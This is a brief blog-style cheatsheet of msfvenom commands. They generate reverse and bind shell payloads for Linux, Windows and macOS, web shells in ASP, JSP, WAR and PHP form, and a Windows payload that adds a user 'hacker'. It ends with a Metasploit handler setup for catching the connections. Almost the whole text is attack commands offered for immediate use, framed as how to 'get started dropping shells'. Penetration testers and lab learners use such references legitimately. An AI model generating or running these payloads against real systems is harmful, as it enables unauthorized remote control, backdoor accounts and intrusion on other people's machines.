MSFVenom Cheatsheet
2 min readOct 4, 2021
MSFVenom, if you’re not already familiar, is the payload creating cousin of Metasploit. With it, you can create a wide variety of shellcodes, reverse tcp connectors, and much more. I’ll leave the full explanation for another article, as I’m sure you probably know the basics if you’re here. This command cheatsheet should be all you need to get started dropping shells.
Commands
List available payloads
msfvenom -l payloadsList payload options
msfvenom -p PAYLOAD --list-optionsMeterpreter reverse shell x86 multi stage
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elfLinuxLinux Meterpreter bind shell x86 multi stage
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elfLinux bind shell x64 single stage
msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elfLinux reverse shell x64 single stage
msfvenom -p linux/x64/shell_reverse_tcp RHOST=IP LPORT=PORT -f elf > shell.elfWindows Meterpreter reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exeWindows Meterpreter bind shell
msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe > shell.exeWindows CMD Multi Stage
msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exeWindows CMD Single Stage
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exeWindows add user
msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exeMac Reverse Shell
msfvenom -p osx/x86/shell_reverse_tcp LHOST=IP LPORT=PORT -f macho > shell.machoMac Bind shell
msfvenom -p osx/x86/shell_bind_tcp RHOST=IP LPORT=PORT -f macho > shell.machoPython Shell
msfvenom -p cmd/unix/reverse_python LHOST=IP LPORT=PORT -f raw > shell.pyBASH Shell
msfvenom -p cmd/unix/reverse_bash LHOST=IP LPORT=PORT -f raw > shell.shPERL Shell
msfvenom -p cmd/unix/reverse_perl LHOST=IP LPORT=PORT -f raw > shell.plASP Meterpreter shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f asp > shell.aspJSP Shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PORT -f raw > shell.jsp WAR Shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PORT -f war > shell.war Php Reverse Shell
msfvenom -p php/reverse_php LHOST=IP LPORT=PORT -f raw > phpreverseshell.php
Bonus
Additionally, here is an example of how to start a listener through metasploit.
root@kali: msfconsole -qmsf: use exploit/multi/handler
msf: set LHOST <your listening address>
msf: set LPORT <your listening port>
msf: set payload windows/shell/reverse_tcp <or relevant payload>
msf: run
